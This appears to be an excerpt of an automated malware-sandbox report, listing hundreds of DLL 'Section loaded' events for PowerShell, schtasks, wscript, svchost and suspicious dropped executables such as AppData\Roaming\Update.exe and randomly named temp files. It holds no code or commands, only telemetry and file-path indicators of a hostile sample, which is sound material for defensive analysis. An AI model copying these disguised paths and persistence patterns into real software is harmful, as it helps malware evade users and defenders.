                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: dxgidebug.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sfc_os.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: dwmapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: riched20.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: usp10.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: msls31.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windowscodecs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: textshaping.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: textinputframework.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: coreuicomponents.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: coremessaging.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: ntmarta.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wintypes.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: propsys.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: edputil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: urlmon.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: iertutil.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: srvcli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: netutils.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: policymanager.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: appresolver.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: bcp47langs.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: slc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: userenv.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: sppc.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: pcacli.dll
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: apphelp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: version.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: windows.storage.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: wldp.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: profapi.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: dwrite.dll
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXESection loaded: textshaping.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: mscoree.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: version.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\user\AppData\Roaming\Update.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: mscoree.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: apphelp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: kernel.appcore.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: version.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: uxtheme.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: windows.storage.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wldp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: profapi.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: cryptsp.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: rsaenh.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: cryptbase.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: sspicli.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ktmw32.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: ntmarta.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wbemcomn.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: amsi.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: userenv.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: propsys.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: dlnashext.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wpdshext.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: edputil.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: urlmon.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: iertutil.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: srvcli.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: netutils.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: wintypes.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: appresolver.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: bcp47langs.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: slc.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: sppc.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeSection loaded: onecoreuapcommonproxystub.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
